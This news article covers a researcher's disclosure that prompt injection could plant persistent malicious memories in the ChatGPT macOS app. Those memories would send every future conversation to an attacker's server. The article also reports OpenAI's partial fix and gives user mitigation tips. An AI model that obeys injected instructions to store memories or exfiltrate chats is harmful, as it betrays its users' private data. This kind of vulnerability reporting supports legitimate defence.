Hacker creates fake memories in ChatGPT to steal victim data – but it may not be as bad as it sounds
Security researchers have exposed a vulnerability that could allow attackers to store malicious instructions in a user’s memory settings in the ChatGPT MacOS app.
A report by Johann Rehberger at Embrace the red noted how an attacker could trigger a prompt injection to take control of ChatGPT, and then insert a memory into its long-term storage and persistence mechanism. This leads to the exfiltration of the conversation on both sides directly to the attacker’s server.
From that point on, the prompt is stored as ‘memory persistent’, so all future conversations with the chatbot will have the same vulnerability. Since ChatGPT remembers things about its users, such as names, ages, locations, likes and dislikes, and previous searches, this exploit poses a serious risk to users.
Stay safe
In response, OpenAI introduced an API that means the exploit is no longer possible via ChatGPT’s web interface, and also released a fix to prevent memories from being used as an exfiltration vector. However, researchers say that untrusted third-party content can still inject prompts that could abuse the memory tool.
The good news is that the memory tool is automatically enabled by default in ChatGPT, but can be disabled by the user. The feature is great for those who want a more personalized experience with the chatbot, as it can listen to your wants and needs and make suggestions based on the information – but there are clearly dangers.
To mitigate the risks of this, users should be vigilant when using the chatbot and pay particular attention to the ‘new memories added’ messages. By regularly reviewing the saved memories, users can check for potentially planted memories.
This isn’t the first vulnerability researchers have discovered in ChatGPT. There are concerns that the plugins could allow attackers to take over other users’ accounts and potentially gain access to sensitive data.